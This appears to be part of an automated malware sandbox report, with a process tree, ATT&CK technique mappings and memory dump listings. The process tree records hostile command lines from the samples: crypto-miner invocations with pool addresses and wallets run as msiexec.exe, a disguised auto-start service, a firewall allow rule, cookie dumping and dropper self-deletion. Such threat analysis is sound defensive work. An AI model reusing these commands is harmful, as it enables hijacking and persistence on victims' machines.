                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:5868
                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4844@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w20985 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:4760
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                      PID:5460
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2204
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:4860
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:5600
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:7112
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:4896
                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                    PID:2228
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:6104
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    PID:4532
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4676
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4884
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:6696
                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6280
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6F7A.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6F7A.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5580
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6FE8.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6FE8.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4244
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 868
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:3972
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 896
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:5444
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 924
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:6104
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 976
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:4000
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 1124
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:5156
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 1180
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:7060
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 1148
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:6284
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 1236
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:5500
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\71AF.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\71AF.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7634.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7634.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:6036
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7EA1.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7EA1.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wrunsvy\
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rielcbfj.exe" C:\Windows\SysWOW64\wrunsvy\
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:7112
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" create wrunsvy binPath= "C:\Windows\SysWOW64\wrunsvy\rielcbfj.exe /d\"C:\Users\Admin\AppData\Local\Temp\7EA1.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:7148
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" description wrunsvy "wifi internet conection"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:7024
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start wrunsvy
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5616
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:6972
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8B83.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8B83.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7000
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wrunsvy\rielcbfj.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\wrunsvy\rielcbfj.exe /d"C:\Users\Admin\AppData\Local\Temp\7EA1.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        svchost.exe
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:5336
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\978A.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\978A.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:5272
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\99FC.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\99FC.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:4212

                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              892d845ff06804e3dd8479be6c9677b6

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              5815f7288dd7e4c6687957b83eb7d522c642be28

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              d79fa7542f8ff07901b7cdc1bf06a619705f826713e9f6d17779b36d25abe952

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cc1664b3f141007f4dc1379b3009248cce31ec9f46218b466c1bd0f1f967a330283f9d57f7f2c663241c688caa5a6981a0f47276674c81bd2f5d5e271092663d

                                                                                                                                                                                                                                                                                            • \??\pipe\crashpad_3164_QCQZREDBLSBSBFBV
                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                            • \??\pipe\crashpad_5076_CSOEXLYOVPSUIFKD
                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                            • memory/344-264-0x0000022347B50000-0x0000022347BC0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/500-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/808-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/900-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/992-300-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              284KB

                                                                                                                                                                                                                                                                                            • memory/996-255-0x0000028903C30000-0x0000028903CA0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1004-278-0x0000000004180000-0x0000000004211000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              580KB

                                                                                                                                                                                                                                                                                            • memory/1004-279-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              57.9MB

                                                                                                                                                                                                                                                                                            • memory/1172-262-0x0000020298280000-0x00000202982F0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1180-270-0x0000028C5D6B0000-0x0000028C5D720000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1320-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/1352-266-0x000001F2F2790000-0x000001F2F2800000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1376-272-0x00000186BEA00000-0x00000186BEA70000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1468-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/1604-282-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              17.3MB

                                                                                                                                                                                                                                                                                            • memory/1604-277-0x0000000004DF0000-0x0000000005EF2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              17.0MB

                                                                                                                                                                                                                                                                                            • memory/1660-285-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              288KB

                                                                                                                                                                                                                                                                                            • memory/1804-123-0x00007FFD739E0000-0x00007FFD739E1000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/1804-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/1948-284-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              356KB

                                                                                                                                                                                                                                                                                            • memory/1964-268-0x0000011193180000-0x00000111931F0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/1996-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/2192-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/2272-297-0x0000000000430000-0x000000000057A000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                            • memory/2272-298-0x00000000008B0000-0x00000000008C2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                            • memory/2368-281-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              172KB

                                                                                                                                                                                                                                                                                            • memory/2484-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/2504-257-0x000002978EA40000-0x000002978EAB0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/2540-260-0x0000019891D20000-0x0000019891D90000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/2548-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/2796-274-0x000001FE32860000-0x000001FE328D0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/2804-276-0x000002603B7A0000-0x000002603B810000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/2828-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/2856-252-0x00000272AB160000-0x00000272AB1D0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/3220-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/3376-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/3728-280-0x0000000001240000-0x0000000001242000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/3752-306-0x0000028352E10000-0x0000028352E5B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              300KB

                                                                                                                                                                                                                                                                                            • memory/3752-249-0x0000028352E70000-0x0000028352EE0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/3752-307-0x0000028353070000-0x00000283530E0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/3752-248-0x0000028352DB0000-0x0000028352DFB000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              300KB

                                                                                                                                                                                                                                                                                            • memory/3868-287-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              88KB

                                                                                                                                                                                                                                                                                            • memory/3892-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/3976-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4148-286-0x0000022D63B00000-0x0000022D63BFF000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1020KB

                                                                                                                                                                                                                                                                                            • memory/4148-253-0x0000022D61570000-0x0000022D615E0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                            • memory/4192-259-0x000000001B310000-0x000000001B312000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4248-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4260-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4360-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4416-292-0x00000000010B2000-0x00000000010B4000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4416-293-0x00000000010B5000-0x00000000010B7000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4416-295-0x00000000010B4000-0x00000000010B5000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4416-290-0x00000000010B0000-0x00000000010B2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4428-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4436-302-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              3.5MB

                                                                                                                                                                                                                                                                                            • memory/4480-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4564-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4568-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4576-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4588-289-0x00000000022E0000-0x00000000022E2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4588-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4608-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4628-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4692-301-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              288KB

                                                                                                                                                                                                                                                                                            • memory/4744-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4760-303-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              7.0MB

                                                                                                                                                                                                                                                                                            • memory/4768-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4792-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4808-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4848-193-0x0000000000000000-mapping.dmp
